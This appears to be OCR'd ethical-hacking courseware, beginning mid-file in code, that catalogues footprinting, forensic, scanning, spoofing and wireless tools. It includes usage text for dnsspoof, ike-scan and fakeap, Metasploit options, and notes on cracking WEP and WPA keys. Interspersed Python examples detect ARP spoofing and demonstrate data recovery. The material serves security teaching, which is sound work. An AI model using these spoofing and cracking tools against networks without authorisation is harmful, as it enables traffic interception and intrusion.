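    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(s):
    return bytes(int(o) for o in s.split("."))


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP packet (RFC 826).  Requests go to
    the broadcast MAC with the target hardware address zeroed, as arping
    sends them; replies are unicast and carry the answering MAC."""
    if op == ARP_REQUEST:
        eth_dst, tha = BROADCAST, "00:00:00:00:00:00"
    else:
        eth_dst, tha = target_mac, target_mac
    eth = mac_bytes(eth_dst) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
           + mac_bytes(sender_mac) + ip_bytes(sender_ip)
           + mac_bytes(tha) + ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet/ARP frame, or None for anything
    else (wrong ethertype, non-Ethernet/IPv4 ARP, or a truncated frame)."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    body = frame[22:42]
    return {"op": op, "sha": mac_str(body[0:6]), "spa": ip_str(body[6:10]),
            "tha": mac_str(body[10:16]), "tpa": ip_str(body[16:20])}


class ArpWatcher:
    """Keeps the last MAC seen for every IP (arpwatch's arp.dat) and records
    every change, the event arpwatch reports as 'changed ethernet address'."""
    def __init__(self):
        self.table = {}      # ip -> mac
        self.alerts = []     # (ip, old mac, new mac)

    def feed(self, frame):
        arp = parse_arp(frame)
        if arp is None:
            return "ignored"
        ip, mac = arp["spa"], arp["sha"]
        old = self.table.get(ip)
        self.table[ip] = mac
        if old is None:
            return "new station"
        if old != mac:
            self.alerts.append((ip, old, mac))
            return "changed ethernet address"
        return "seen"


# Constructed traffic: a host asks for the gateway, the real gateway answers,
# then a spoofed reply claims the gateway IP from a different MAC.
HOST_MAC, HOST_IP = "00:aa:bb:cc:dd:ee", "192.168.1.10"
GATEWAY_MAC, GATEWAY_IP = "00:11:22:33:44:55", "192.168.1.1"
ATTACKER_MAC = "de:ad:be:ef:00:01"
SAMPLE_FRAMES = [
    build_arp(ARP_REQUEST, HOST_MAC, HOST_IP, BROADCAST, GATEWAY_IP),
    build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, HOST_MAC, HOST_IP),
    build_arp(ARP_REPLY, ATTACKER_MAC, GATEWAY_IP, HOST_MAC, HOST_IP),
    b"\x00" * 60,                                   # not ARP at all
]


def demo(frames=SAMPLE_FRAMES):
    w = ArpWatcher()
    return [w.feed(f) for f in frames], w.alerts


if __name__ == "__main__":
    events, alerts = demo()
    print(events)
    for ip, old, new in alerts:
        print(f"ALERT {ip}: {old} -> {new}")
```

A watcher like this learns from both requests and replies, as arpwatch does, so a spoofed reply that beats the legitimate one still shows up as a change the moment the real host speaks again.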
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Footprinting Tools: Dcetest, Dlint

Dcetest

© Provides MSRPC endpoint information.
© Works on the UNIX platform also.

Dlint

© Explores the specified DNS zone

© Able to explore sub-zones under the given zone
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Footprinting Tools: Dnswalk, FFP

Dnswalk

© DNS debugger

© Transfers the zone of the given domain

FFP

© Generates fuzzy fingerprints

© The fingerprints resemble the target's fingerprint
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Footprinting Tools: Finger, Fpdns

Finger

© Provides information about the system's users
© Gives user-friendly reports

Fpdns

© Sends borderline DNS queries and analyzes the responses

© Determines the brand and version of the name server
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Footprinting Tools: Fping, Host

fping

© Determines which hosts are up

© Many hosts can be specified on the command line to ping

© Used in scripts

© Works in round-robin fashion

Host

© Queries the DNS server for domain names and zones
© Able to determine the original version of host
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Footprinting Tool: Itrace

© Can trace the path that packets take through the Internet

© Gathers information about packets like origin, destination and time sent, etc.

© Helps to trace the origin of a denial-of-service attack.
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Footprinting Tools: MTR, Netmask

MTR

© Determines the network connection between hosts

© Can be compiled without GUI support, which conserves disk space.

Netmask

© Determines the network mask of the specified host.
© Can change the netmask format.
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Footprinting Tool: Nmblookup

© A part of the samba(7) suite.

© Directs NetBIOS name queries to the specified IP broadcast domain.

© Queries execute over UDP.

© Uses many options to perform various other tasks.
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Footprinting Tool: Queso

© Recognizes and lists operating systems

© Identifies them from the TCP packet signature and not from banners, daemon versions, etc.

© The config file holds about 80 operating systems with their versions

© Identifies Linux kernel versions and the TCP replies from devices like routers, terminal servers, printers, etc.
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Footprinting Tool: Nwatch

© Security tool that deals with network monitoring, policy development, and certain types of intrusion detection

© Verifies IP addresses by checking host details and services for a given amount of time

© Organizes traffic like a port scanner

© Its options are:

-d or -device <device-name>    Open the specified device. If not specified, nwatch (libpcap) will choose an interface.

-o or -output <filename-or-:tag>    Output is written to the specified file or a data store tag.

-h [!]<host ranges>[:<port ranges>]    Specifies host ranges and ignores the other network traffic.

[-fi | -flush-interval <seconds>]    Sets the flush interval to <seconds>. Default is 300 (5 minutes).

[-si | -sample-interval <seconds>]    Sets the sampling interval to <seconds>. Default is 3600 * 24 (1 day).
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Footprinting Tool: Smb4k

© SMB share browser for KDE, based on the Samba software package

© Helps in browsing the local network neighborhood.
© Its main features are:

• Scanning for (active) workgroups, hosts, and shares

• Mounting and unmounting of SMB and CIFS shares

• Access to the files of a mounted SMB or CIFS share using Konqueror

• Auto-detection of external mounts/unmounts

• Remounting of recently used shares on program start
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Footprinting Tool: Smbget

© Downloader for the SMB/CIFS protocol
© Important features are:

• Recursive downloading

• Supports SMB URLs
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Footprinting Tool: Socat

© Multipurpose relay for bi-directional data transfer

© Command line utility

© Socat can be used as:

• TCP port forwarder

• External socksifier

• Tool for attacking weak firewalls

• Shell interface to Unix sockets
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Footprinting Tools: Traceproto, Traceroute-nanog

© Traceproto

• Traceroute replacement in C

• Supports TCP, UDP, ICMP traces

© Traceroute-nanog

• Determines the route of packets in TCP/IP networks

• Requires root privileges to open a socket

• Malicious user can access
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Footprinting Tool: Tcptraceroute

© Utilizes TCP for tracing
© Detects and tests firewall rules and access control lists
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Footprinting Tool: Tinysnmp

© Implements the SNMPv1 protocol specified in RFC 1157

© It's a package holding implementations of the SNMP utilities available in many SNMP implementations.
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Footprinting Tool: Tkmib

© A Net-SNMP MIB browser
© Queries remote devices for SNMP information
© Provides a graphical front-end for the SNMP tools
© Helps in browsing the MIB tree
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Ethical Hacking

Forensics Tools

Forensic Tool: Autopsy

© Forensic browser: a graphical interface to command-line forensic analysis tools
© Provides a file manager
© HTML-based browser interface
© Supports the Linux platform
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Forensic Tool: Biew

© Binary VIEW
© Features of biew:

• Advanced file viewer

• Built-in editor

© Works on platforms:

• DOS

• Win32

• OS/2

• Linux

• Unix
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Forensic Tool: Clamav

© GPL anti-virus toolkit for Unix

© Integrates with mail servers

© Command line scanner

© Multi-threaded daemon

© Detects around 36,000 viruses, worms and trojans

© Built-in support for zip, gzip, mbox, etc.
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Forensic Tool: Dd_rescue

© Data recovery tool with automated operation
© Copies data from one file (or device) to another
© Can copy backwards
© Two block sizes are used:

• Large (soft) block size

• Small (hard) block size

© The differences from dd are:

• No character conversion

• Does not abort on errors

• Does not truncate the output file
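The two block sizes and the "does not abort on errors" behaviour fit together into one copy strategy, shown here as an added example that is not dd_rescue's own code. The source is a simulated device whose reads fail on certain offsets: the copy runs in large (soft) blocks, retries any failed soft block in small (hard) blocks, leaves the still-unreadable hard blocks as zeros instead of giving up, and can also run backwards. The device contents and the bad offsets are constructed for the demo.

```python
"""Added example (not dd_rescue's own code): the soft/hard block copy
strategy described above, carried out in memory against a simulated
failing device.  Device contents and bad offsets are constructed."""


class FlakyDevice:
    """In-memory stand-in for a failing disk: read() raises OSError if the
    requested range touches any bad byte."""
    def __init__(self, data, bad_offsets):
        self.data = data
        self.bad = set(bad_offsets)

    def read(self, offset, length):
        end = min(offset + length, len(self.data))
        if any(offset <= b < end for b in self.bad):
            raise OSError(f"I/O error reading {offset}+{length}")
        return self.data[offset:end]


def rescue(dev, size, soft=4096, hard=512, reverse=False):
    """Copy `size` bytes from dev.  Returns (output bytes, bytes copied,
    offsets of hard blocks that could not be read)."""
    out = bytearray(size)          # pre-sized: an unreadable hole stays zero
    copied = 0
    bad_blocks = []

    def copy(offset, length):
        nonlocal copied
        try:
            chunk = dev.read(offset, length)
        except OSError:
            return False
        out[offset:offset + len(chunk)] = chunk
        copied += len(chunk)
        return True

    soft_starts = range(0, size, soft)
    for off in (reversed(soft_starts) if reverse else soft_starts):
        n = min(soft, size - off)
        if copy(off, n):
            continue
        # Soft block failed: walk it again in hard blocks so only the bad
        # sectors are lost.  Never abort, the key difference from plain dd.
        hard_starts = range(off, off + n, hard)
        for h in (reversed(hard_starts) if reverse else hard_starts):
            if not copy(h, min(hard, off + n - h)):
                bad_blocks.append(h)
    return bytes(out), copied, sorted(bad_blocks)


# Constructed 16 KiB "disk" with two unreadable bytes inside one 512-byte sector.
DISK = bytes(range(256)) * 64
BAD = {5000, 5001}


def demo(reverse=False):
    return rescue(FlakyDevice(DISK, BAD), len(DISK), reverse=reverse)


if __name__ == "__main__":
    data, copied, bad = demo()
    print(f"copied {copied} of {len(DISK)} bytes; unreadable hard blocks at {bad}")
```

On the sample device only one 512-byte hard block is lost out of the 4096-byte soft block that failed, which is the whole point of the two sizes: fast copying where the medium is good, fine-grained recovery where it is not.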
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Forensic Tool: Fenris

© Multipurpose tracer

© Partial decompiler

© No source is required

© Helpful for black-box testing and evaluation

© Features of Fenris:

• Traditional interactive debugging

• Fingerprints functions in static binaries

• Reconstructs symbol tables

• Delivered with both text-based and graphical interfaces
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Forensic Tool: Foremost

© Automatic file recovery program for Linux

© Referred to as data carving

© Works on image files

© Add-on for the TASK suite

© Supported operating systems:

• Linux

• BSD

• Unix
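Data carving, as the slide calls it, means scanning an image for known file headers and cutting out everything up to the matching footer (or a size limit) without any help from the file system. The following added example is not foremost's own code: it applies that technique with the well-known JPEG and PNG magic values to a small constructed image. The embedded files are stubs with valid magic at both ends rather than real pictures, and the maximum carve sizes are assumptions, not foremost's defaults.

```python
"""Added example (not foremost's own code): header/footer data carving
over a constructed disk image.  The JPEG/PNG stubs are not real pictures
and the size limits are assumptions."""

# (header, footer, maximum carve size)
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9", 20 * 1024 * 1024),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xae\x42\x60\x82", 20 * 1024 * 1024),
}


def carve(image, signatures=SIGNATURES):
    """Return [(type, offset, data), ...] sorted by offset.  A header with no
    footer inside its size limit is carved up to the limit (or the end of
    the image), which is how a truncated file comes out of a carver."""
    found = []
    for ext, (header, footer, max_len) in signatures.items():
        pos = image.find(header)
        while pos != -1:
            limit = min(len(image), pos + max_len)
            end = image.find(footer, pos + len(header), limit)
            if end != -1:
                length = end + len(footer) - pos
            else:
                length = limit - pos
            found.append((ext, pos, image[pos:pos + length]))
            # Continue after the carved region; a second header inside a
            # carved file (an embedded thumbnail, say) is deliberately skipped.
            pos = image.find(header, pos + length)
    found.sort(key=lambda f: f[1])
    return found


# Stub files: valid magic at both ends, filler in between.
JPEG_STUB = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x01" * 40 + b"\xff\xd9"
PNG_STUB = (b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + b"\x02" * 30
            + b"IEND\xae\x42\x60\x82")
TRUNCATED_JPEG = b"\xff\xd8\xff\xe0" + b"\x03" * 10        # no footer

# Constructed "disk image": unallocated filler with the stubs scattered in it.
IMAGE = (b"\x00" * 100 + JPEG_STUB + b"\x11" * 50 + PNG_STUB
         + b"\x00" * 30 + TRUNCATED_JPEG)


def demo():
    return [(ext, off, len(data)) for ext, off, data in carve(IMAGE)]


if __name__ == "__main__":
    for ext, off, size in demo():
        print(f"{ext} at offset {off}, {size} bytes")
```

The size limit matters more than it looks: a JPEG whose footer was overwritten would otherwise swallow the rest of the image, so a carver always bounds each file, and a practitioner checks the carved output rather than trusting its extension.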
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Forensic Tools: Gtkrecover, Wipe

© Gtkrecover

• GUI for recover

• Undeletes files on ext2 partitions

[Screenshot: GtkRecover v0.2 (based on recover-1.0a, (C) 1999, 2000 by Tom Pycke) asking for the partition's device name and the year, month, weekday and first/last possible day of the month on which the file was deleted, with "Quit" and "Find It" buttons]

© Wipe

• Secure file wiping tool

• Deletes data by overwriting

• Supported on Linux



© Digital Forensic Tooll<it 

© Recovers deleted files and reconstructs 
scenarios 

© Previously known as TASK 

© Collection of Unix based command line file 
systems and media management forensic 
analysis tools 

© Tested on Linux, MacOSX, Open & FreeBSD, 
Solaris and CYGWIN 
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Forensic Tool: Tct

© The Coroner's Toolkit

© Unix-based command line tools

© The tools in tct are:

• grave-robber

• mactime and ils

• lazarus and unrm

• findkey

© Limitations of tct:

• File system tools operate only at the block and inode layer

• Platform dependency
Forensic Tool : Testdisk

TestDisk 5.4, Data Recovery Utility, November 2004
Christophe GRENIER <grenier@cgsecurity.org>
http://www.cgsecurity.org

Disk /dev/sda - CHS 14593 255 63 - 114470 MB

     Partition            Start CHS      End CHS     Size in sectors
 1 * HPFS - NTFS          0   1  1    1816 254 63     29190042 [50_01i36]
 2 P HPFS - NTFS       1817   0  1    3633 254 63     29190105 [Test]
 3 E extended LBA      3634   0  1   14592 254 63    176056335
 5 L HPFS - NTFS       3634   1  1    6303 254 63     42893487 [Nadine]
 6 L HPFS - NTFS       6304   1  1   14517 254 63    131957847 [Sabine]
 7 L FAT32 LBA        14518   1  1   14586 254 63      1108422
 8 L FAT32 LBA        14587   1  1   14592 254 63        96327 [BOOTEN]

[ Quit ]  [ Search! ]
Write partition structure to disk

• Checks and undeletes partitions
• Recovers lost partitions
• Works with FAT12, FAT16, FAT32, NTFS, EXT2FS/EXT3FS, Linux swap, etc.
• Features for both novices and experts
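A worked check on the partition table in the TestDisk screenshot above, added here as an example; it is not TestDisk's code and not part of the courseware. It converts each CHS start and end address to an LBA sector number using the geometry printed by TestDisk (14593 cylinders, 255 heads, 63 sectors per track), recomputes each partition's size in sectors, and flags an entry whose size disagrees with the listed one, that runs past the end of the disk, that does not end on a cylinder boundary, or that overlaps a neighbour (a logical partition inside its extended container is the one overlap allowed). The geometry and entries are taken from the screenshot; the function and variable names are this example's own.

```python
# Added example: consistency checks for the CHS partition entries shown in the
# TestDisk screenshot.  Not TestDisk's code; the names used are this example's own.

# Disk geometry from the screenshot: CHS 14593 255 63
CYLINDERS = 14593
HEADS = 255
SECTORS = 63
SECTOR_BYTES = 512

# Entries from the screenshot: (number, status, type, start CHS, end CHS, size listed)
# status: * bootable primary, P primary, E extended container, L logical
TABLE = [
    (1, "*", "HPFS - NTFS",  (0, 1, 1),     (1816, 254, 63),  29190042),
    (2, "P", "HPFS - NTFS",  (1817, 0, 1),  (3633, 254, 63),  29190105),
    (3, "E", "extended LBA", (3634, 0, 1),  (14592, 254, 63), 176056335),
    (5, "L", "HPFS - NTFS",  (3634, 1, 1),  (6303, 254, 63),  42893487),
    (6, "L", "HPFS - NTFS",  (6304, 1, 1),  (14517, 254, 63), 131957847),
    (7, "L", "FAT32 LBA",    (14518, 1, 1), (14586, 254, 63), 1108422),
    (8, "L", "FAT32 LBA",    (14587, 1, 1), (14592, 254, 63), 96327),
]


def chs_to_lba(cyl, head, sect, heads=HEADS, sectors=SECTORS):
    """Zero-based LBA of a CHS address; CHS sectors count from 1, hence the -1."""
    if not 0 <= head < heads or not 1 <= sect <= sectors:
        raise ValueError(f"CHS {(cyl, head, sect)} is outside the geometry")
    return (cyl * heads + head) * sectors + (sect - 1)


def partition_size(start, end):
    """Sectors spanned by an inclusive CHS start..end range."""
    return chs_to_lba(*end) - chs_to_lba(*start) + 1


def disk_size_mb(cylinders=CYLINDERS, heads=HEADS, sectors=SECTORS):
    """Whole-disk capacity in MiB, as TestDisk prints it next to the geometry."""
    return cylinders * heads * sectors * SECTOR_BYTES // (1024 * 1024)


def check_table(table, cylinders=CYLINDERS):
    """Return [(number, computed size, ok)] for each entry.

    ok is False when the computed size differs from the listed one, the entry
    runs past the disk, it does not end on a cylinder boundary, or it overlaps
    an earlier entry other than through the extended/logical container relation.
    """
    disk_end = cylinders * HEADS * SECTORS   # first LBA past the end of the disk
    accepted = []                            # (first, last, status) of earlier entries
    results = []
    for number, status, _ptype, start, end, listed in table:
        first, last = chs_to_lba(*start), chs_to_lba(*end)
        size = last - first + 1
        ok = (size == listed
              and last < disk_end
              and end[1] == HEADS - 1 and end[2] == SECTORS)
        for p_first, p_last, p_status in accepted:
            overlaps = first <= p_last and p_first <= last
            if overlaps and {status, p_status} != {"E", "L"}:
                ok = False
        accepted.append((first, last, status))
        results.append((number, size, ok))
    return results


if __name__ == "__main__":
    print(f"Disk: {disk_size_mb()} MB")
    for number, size, ok in check_table(TABLE):
        print(f"partition {number}: {size:>10} sectors  {'ok' if ok else 'INCONSISTENT'}")
```

Every entry in the screenshot passes, and the computed capacity matches the 114470 MB TestDisk prints; corrupting a single end-head value in an entry makes both the size and the cylinder-boundary test fail, which is the kind of inconsistency a recovery tool uses to tell a valid table entry from garbage.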

Copyright © by EC-Council
Ethical Hacking

Honeypots

Honeypot : Impost

• Network protocol security auditing tool
• Multi-purpose network debugging tool
• History is maintained for further reference
• Supports Linux, Unix, Mac OS X, FreeBSD and OpenBSD
• Two kinds of operating modes are used:
  - Honeypot
  - Packet sniffer
Honeypots : Labrea, iisemulator

labrea

• Also called a sticky honeypot
• Creates a virtual server
• Latest versions are tested on Windows 98/2K, Linux, FreeBSD and Solaris
• Invoked as: LaBrea <options> <BPF filter>

iisemulator

• Emulates an IIS web server
• Used with honeypot-deployment software
• Creates a virtual server
Ethical Hacking

Scanning Tools

Scanning Tool : AB

• Performs testing of web pages, sites and dynamic scripts
• Creates single or multiple requests per second
• Generates clear result reports
Scanning Tools : ADM-smb, Knocker

ADM-smb

• Retrieves the NetBIOS name of the machine
• Performs a complete audit of Samba on the host provided

Knocker

• TCP security port scanner written in C, using threads
• Analyzes hosts and the network services which are running
Scanning Tool : Amap

• Ignores the port numbers and probes IP ports for running protocols
• Locates services running on non-standard ports
• Retrieves information about ports that don't display output
Scanning Tool : ASS

• Autonomous System Scanner, designed to find the AS of the router
• Helps routing protocols to distinguish between various routing "domains" and different means of communication
• Works as a TCP port scanner
Scanning Tool : IKE-scan

• Scans IP addresses for VPN servers by sending a specially crafted IKE packet to each host within a network
• Monitors retransmission packets
• Exploits transport characteristics in the Internet Key Exchange (IKE) service

C:\WINNT\system32\cmd.exe

Usage: ike-scan [options] [hosts...]

Target hosts must be specified on the command line unless the --file option is
given, in which case the targets are read from the specified file instead.

The target hosts can be specified as IP addresses or hostnames. You can also
specify IPnetwork/bits (e.g. 192.168.1.0/24) to specify all hosts in the given
network (network and broadcast addresses included), and IPstart-IPend
(e.g. 192.168.1.3-192.168.1.27) to specify all hosts in the inclusive range.

These different options for specifying target hosts may be used both on the
command line, and also in the file specified with the --file option.

In the options below a letter or word in angle brackets like <f> denotes a
value or string that should be supplied. The corresponding text should
indicate the meaning of this value or string. When supplying the value or
string, do not include the angle brackets. Text in square brackets like [<f>]
mean that the enclosed text is optional. This is used for options which take
an optional argument.

Options:

--help or -h            Display this usage message and exit.

--file=<fn> or -f <fn>  Read hostnames or addresses from the specified file
• An advanced open-source platform for developing, testing, and using exploit code
• A powerful tool for penetration testing, exploit development, and vulnerability research
• Supports the Perl language and allows the Framework to run on almost any Unix-like system

Advanced Module Options

DirectSMB   Optional   DATA   0      Advanced exploit option
  Use the direct SMB protocol [445/tcp] instead of SMB over NetBIOS

FragSize    Optional   DATA   1024   Advanced exploit option
  The application fragment size to use with DCE RPC
Scanning Tool : nmapFE

• Performs port scanning including remote OS detection via TCP/IP fingerprinting, ping sweeps, uptime calculation, protocol scans, etc.
• Connects to open ports and interrogates them for information using probes to retrieve a detailed assessment of what is really running on the system

cmd.exe (running as PLAYGROUND\root)

E:\>cd nmap

E:\nmap>nmap -A -T4 scanme.insecure.org

Starting nmap 3.48 ( http://www.insecure.org/nmap ) at 2003-12-20 03:20 Pacific Standard Time
Interesting ports on scanme.insecure.org (205.217.153.55):
(The 1652 ports scanned but not shown below are in state: filtered)
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 3.1p1 (protocol 1.99)
25/tcp  open   smtp    qmail smtpd
53/tcp  open   domain  ISC Bind 9.2.1
80/tcp  open   http    Apache httpd 2.0.39 ((Unix) mod_perl/1.99_07-dev Perl/v5.6.1)
113/tcp closed auth
Device type: general purpose
Running: Linux 2.4.X|2.5.X
OS details: Linux Kernel 2.4.0 - 2.5.20
Uptime 212.653 days (since Wed May 21 12:40:35 2003)

Nmap run completed -- 1 IP address (1 host up) scanned in 54.588 seconds

E:\nmap>
Scanning Tool : Nmblookup

• Queries NetBIOS names and maps them to their IP address within the network
• Allows name queries to be directed at a particular IP broadcast area or machine
• All queries are undertaken over UDP
Scanning Tools : Pnscan, Protos

Pnscan

• A multi-threaded port scanner that quickly scans a large network
• Faster than nmap

Protos

• An IP protocol scanner
• Navigates through all possible IP protocols and uses a negative scan to sort out unsupported protocols
Scanning Tools : Raccess, Router-Audit-Tool

Raccess

• A security tool to analyze the integrity of systems
• Gains access to a system using the most advanced techniques of remote intrusion
• Works in normal mode (fast) and hard mode (more intensive)

Router-Audit-Tool

• Audits router configurations
• Logs into the routers specified using the provided login information
• Checks configurations against the NSA's Cisco Router Configuration Guide
Scanning Tool : RATS

• RATS - Rough Auditing Tool for Security
• Tool for scanning C, C++, Perl, PHP and Python source code
• Provides a security analyst with a list of potential trouble spots
• Provides a relative assessment of the potential severity of each problem
Scanning Tool : Scanrand

• A fast network scanner that scans single hosts to very large networks efficiently
• Performs stateless TCP scanning
Scanning Tool : ScanSSH

• Scans a list of addresses and networks for running SSH servers and their version numbers
• Supports random selection of IP addresses from large network ranges
• Useful for gathering statistics on the deployment of SSH
Scanning Tools : Spike Proxy, Tiger

Spike Proxy

• Functions as an HTTP/HTTPS proxy
• Allows the black box tester to automate a number of web application vulnerability tests

Tiger

• Tiger Analytical Research Assistant (TARA) is an upgrade of the 'tiger' program
• Scans a Unix system looking for security problems
• Provides a check of UNIX systems on the A&M campus that want to be accessed from off campus


Copyright © by EC-Council
All Rights reserved. Reproduction is strictly prohibited




Ethical Hacking

Spoofing Tools

Spoofing Tools : Arpspoof, Dhcpx

Arpspoof

• Facilitates the interception of network traffic normally unavailable to an attacker
• Targets hosts on the same subnet as the attacking machine
• Causes changes in the ARP settings on the local network

Dhcpx

• Dynamic Host Confusion Program
• Requests all available IP addresses from a DHCP server
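The "changes in the ARP settings" the slide mentions are exactly what an arpwatch-style monitor on the segment looks for. The following is an added example, not part of the courseware or of any tool listed here: it reads ARP replies in a tcpdump-like "is-at" form (the sample lines are constructed, not a capture), pins the gateway's IP to its known MAC, and raises an alert when a reply contradicts a pinned entry or when an IP that was already seen with one MAC is claimed by another; it also reports any MAC that answers for several IPs, which is what one host poisoning both ends of a conversation looks like. The function names and the sample addresses are this example's own.

```python
# Added example: arpwatch-style detection of the IP-to-MAC changes that ARP
# spoofing causes.  Not part of arpspoof or the courseware; the replies below
# are constructed, not a real capture.
import re
from collections import defaultdict

# Constructed ARP replies in a tcpdump-like "is-at" form: time, sender IP, sender MAC.
SAMPLE_REPLIES = """\
10:00:01 Reply 192.168.1.1 is-at 00:11:22:33:44:55
10:00:02 Reply 192.168.1.20 is-at 00:aa:bb:cc:dd:20
10:00:05 Reply 192.168.1.1 is-at 00:11:22:33:44:55
10:00:09 Reply 192.168.1.1 is-at de:ad:be:ef:00:01
10:00:09 Reply 192.168.1.20 is-at de:ad:be:ef:00:01
10:00:12 Reply 192.168.1.1 is-at de:ad:be:ef:00:01
"""

REPLY_RE = re.compile(
    r"^(?P<ts>\S+)\s+Reply\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+is-at\s+"
    r"(?P<mac>[0-9a-f]{2}(?::[0-9a-f]{2}){5})$", re.IGNORECASE)


def parse_replies(text):
    """Yield (timestamp, ip, mac) for each well-formed reply line; MACs lowercased."""
    for raw in text.splitlines():
        m = REPLY_RE.match(raw.strip())
        if m:
            yield m.group("ts"), m.group("ip"), m.group("mac").lower()


def detect_arp_spoofing(text, static=None):
    """Return (alerts, shared).

    alerts: (timestamp, ip, kind, detail) where kind is "static-mismatch" when a
            reply contradicts a pinned IP->MAC entry (e.g. the default gateway),
            or "mapping-changed" when an IP that was already seen with one MAC
            is now claimed by another.
    shared: {mac: [ips]} for MACs that answered for more than one IP.
    """
    static = {ip: mac.lower() for ip, mac in (static or {}).items()}
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in parse_replies(text):
        if ip in static and mac != static[ip]:
            alerts.append((ts, ip, "static-mismatch",
                           f"{mac} answered for {ip}, pinned to {static[ip]}"))
        elif ip in ip_to_mac and ip_to_mac[ip] != mac:
            alerts.append((ts, ip, "mapping-changed",
                           f"{ip} moved from {ip_to_mac[ip]} to {mac}"))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
    shared = {mac: sorted(ips) for mac, ips in mac_to_ips.items() if len(ips) > 1}
    return alerts, shared


if __name__ == "__main__":
    found, multi = detect_arp_spoofing(SAMPLE_REPLIES,
                                       static={"192.168.1.1": "00:11:22:33:44:55"})
    for alert in found:
        print(*alert)
    for mac, ips in multi.items():
        print(f"{mac} claims {len(ips)} addresses: {', '.join(ips)}")
```

A static table of the hosts that must never move (gateway, DNS, DHCP server) turns the second and third replies at 10:00:09 and 10:00:12 into unambiguous alerts; without it the monitor can still flag the change, but a legitimate NIC replacement would look the same, so a changed mapping should be confirmed against the switch's MAC table before acting on it.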
Spoofing Tool : CDP

• Used for sending CDP (Cisco Discovery Protocol) messages to the wire
• CDP is a layer 2 protocol used by Cisco routers on the same link (segment)
• Operates in two different modes:
  - Flood mode
  - Spoofing
Spoofing Tool : Dnsspoof

• Forges replies to arbitrary DNS address and pointer queries on the Local Area Network

C:\WINNT\system32\cmd.exe

Usage: dnsspoof count path iplist source fakedip

count  : Packages per ip address. 20 is a good value.
path   : Path to the netwox package. Example: /bin/netwox
iplist : file with ip addresses. One ip per line.
source : source ip address. This can be any address.
fakedip: the ip-address, which is present in the remote
         computers cache.
Spoofing Tools : Etherwake, File2cable

Etherwake

• A little tool to send magic Wake-on-LAN (WOL) packets
• Wakes up WOL-compliant computers which have been powered down to sleep mode
• Supports WOL passwords

File2cable

• Replays a packet capture
• Used to locate new vulnerabilities and to test concepts
Spoofing Tool : Fragroute

• Tests a NIDS by attempting to evade it using fragmented packets
• Intercepts, modifies, and rewrites egress traffic destined for a specified host
• Assists in the testing of network intrusion detection systems
Spoofing Tool : Gspoof

• Makes building and sending TCP/IP packets easier and more accurate
• Operates from the console and also provides a GUI environment

[Screenshot: Gspoof GUI (Console + TCP/IP). Ethernet layer: Iface eth0, Src mac and Dst mac 00:10:D0:1E:26:F4, Eth type LOOPBACK. Network layer: Src addr and Dst addr localhost, ID 32738, TOS. TCP: Src port 5000, Dst port 80, Flags SYN / ACK / FIN / RST / PUSH / URG, SEQ 972737203, ACK, Win size 32767, TCP payload enabled with "get index.html". Multi-mode: Number, Delay (ms) 100. Status lines: TCP header build, IP header build, ETH header build; "Sending 100 ms spaced packets for 2 seconds. Packets correctly written (53 bytes)".]
Spoofing Tool : hping3

• A network tool capable of sending custom ICMP/UDP/TCP packets
• Displays target replies like ping does with ICMP replies
• Handles fragmentation and arbitrary packet body and size
• Tests firewall rules and performs (spoofed) port scanning
Spoofing Tool : HSRP

• Used to take over an HSRP standby IP, to force a switchover, or to DoS this IP
Spoofing Tool : ICMP redirect

• An error message sent by a router to the sender of an IP packet
• Used when a router believes a packet is being routed sub-optimally
• Hosts with multiple gateways could have one default route and more optimal specific routes
Spoofing Tool : IGRP

• Establishes passive probing to estimate link reliability for wired and wireless networks
• Link reliability of a route equals the minimum link reliability along the path
• Handles silent losses
Spoofing Tool : IRDP

• Enables ICMP Router Discovery Protocol (IRDP) processing on an interface
• Sends out IRDP responses
Spoofing Tool : Macchanger

• Utility for manipulating the MAC address of network interfaces
• Sets the MAC randomly
• Displays the vendor MAC list
Spoofing Tool : Scapy

• A powerful interactive packet manipulation tool, packet generator, network scanner, etc.
• Defines a set of packets
• Offers advantages over tools like nmap and hping
Ethical Hacking

Wireless Tools

Wireless Tools : Aircrack, Chopchop

• Aircrack
  - Cracks 802.11 WEP keys
  - Quickly recovers the WEP key once enough encrypted packets have been captured
  - Applies the Fluhrer-Mantin-Shamir (FMS) attack algorithm
  - A 3-byte initialization vector (IV) is carried in every WEP-encrypted packet, and some of them disclose information about the key
• Chopchop
  - Lets the attacker decipher data packets without knowing the WEP key
  - Works on a single encrypted packet, modifying one byte at a time
Wireless Tool : Chopchop

• Lets the attacker decipher data packets without knowing the WEP key
• Works on a single encrypted packet, modifying one byte at a time
Wireless Tool : Cowpatty

• Wireless cracking tool that attempts to crack the WPA-PSK by trying various passwords
• Brute-force cracking tool with tremendous speed
• Can test a maximum of 30-60 words per second
• A list of passwords, a capture file with a complete EAP four-way handshake, and the SSID of the target network are required
Wireless Tool : Fakeap.pl

• Perl utility that generates fake APs with random ESSID, BSSID (MAC), and channel assignments
• Makes it hard for hackers to find the correct AP to work with
• Syntax:

fakeap.pl --interface wlanX [--channel X] [--mac XX:XX...] [--essid NAME] [--words FILENAME] [--sleep N] [--vendors FILENAME] [--wep N] [--key KEY] [--power N]
Wireless Tool : Gkismet

• Kismet is an open source utility used for monitoring wireless network traffic
• gkismet is a GUI front-end for the kismet wireless sniffer, and cannot run independently
• Displays more data on the screen at once
• Easily connects to multiple instances of kismet
Screenshot : Gkismet

